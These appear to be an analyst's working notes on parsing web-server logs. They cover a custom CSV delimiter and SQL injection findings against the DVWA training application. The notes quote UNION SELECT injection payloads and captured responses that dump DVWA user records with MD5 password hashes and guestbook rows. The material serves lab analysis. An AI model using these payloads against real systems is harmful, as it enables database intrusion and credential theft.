#####################################################################################################################
# Work Area
#####################################################################################################################
CSV Delimiter: ~,~
Log format appearance:
Standard (no key/value pairs): "value1","value2","value3","value4"
Gold standard (no key/value pairs): "value1"~,~"value2"~,~"value3"~,~"value4"
Example of a valid URI query that will break the standard CSV format (comma delimiter with "" text qualifier), because the query itself contains commas and double quotes:
https://waflogic.com/partner_inventory? serv_1=(D)DoS Review","serv_deets_1=Review, Consult, Deploy","part_sel="Dynamo Inc., And Partners"
Logs #8, 9, 11 & 12: SQLi vulnerability discovered; the responses also disclosed user ID 1, which is admin (support_id=9216504019076315941 OR support_id=9216504019076315925 OR support_id=9216504019076276916)
The response bodies captured below show the injected UNION SELECT returning rows from dvwa.users (including the password column) and dvwa.guestbook, which indicates the injection succeeded rather than only being attempted.
HTTP/1.1 200 OK\r\nDate: Wed, 07 Jun 2023 02:16:22 GMT\r\nServer: Apache/2.4.57 (Debian)\r\nExpires: Tue, 23 Jun 2009 12:00:00 GMT\r\nCache-Control: no-cache, must-revalidate\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 1360\r\nConnection: close\r\nContent-Type: text/html;charset=utf-8\r\n\r\n\n\n\n\n
\n \n\nID:1) AND 8477=6243 AND (6495=6495\r\n
First name: admin
Surname: admin
Damn Vulnerable Web Application (DVWA)
\n \n\nID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,`user`,avatar,failed_login,first_name,last_login,last_name,password,user_id)),0x71706b6b71) FROM dvwa.users#
First name: admin
Surname: admin
ID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,`user`,avatar,failed_login,first_name,last_login,last_name,password,user_id)),0x71706b6b71) FROM dvwa.users#\r\n
First name:
Surname: qvzkq[""adminazbkad/DVWA/hackable/users/admin.jpgazbkad0azbkadadminazbkad2023-06-05 11:34:14azbkadadminazbkad5f4dcc3b5aa765d61d8327deb882cf99azbkad1"",""gordonbazbkad/DVWA/hackable/users/gordonb.jpgazbkad0azbkadGordonazbkad2023-06-05 11:34:14azbkadBrownazbkade99a18c428cb38d5f260853678922e03azbkad2"",""1337azbkad/DVWA/hackable/users/1337.jpgazbkad0azbkadHackazbkad2023-06-05 11:34:14azbkadMeazbkad8d3533d75ae2c3966d7e0d4fcc69216bazbkad3"",""pabloazbkad/DVWA/hackable/users/pablo.jpgazbkad0azbkadPabloazbkad2023-06-05 11:34:14azbkadPicassoazbkad0d107d09f5bbe40cade3de5c71e9e9b7azbkad4"",""smithyazbkad/DVWA/hackable/users/smithy.jpgazbkad0azbkadBobazbkad2023-06-05 11:34:14azbkadSmithazbkad5f4dcc3b5aa765d61d8327deb882cf99azbkad5""]qpkkq
Damn Vulnerable Web Application (DVWA)
\n \n\nID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,comment,comment_id,name)),0x71706b6b71) FROM dvwa.guestbook#
First name: admin
Surname: admin
ID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,comment,comment_id,name)),0x71706b6b71) FROM dvwa.guestbook#\r\n
First name:
Surname: qvzkq[""This is a test comment.azbkad1azbkadtest""]qpkkq
Damn Vulnerable Web Application (DVWA)
\n \n\n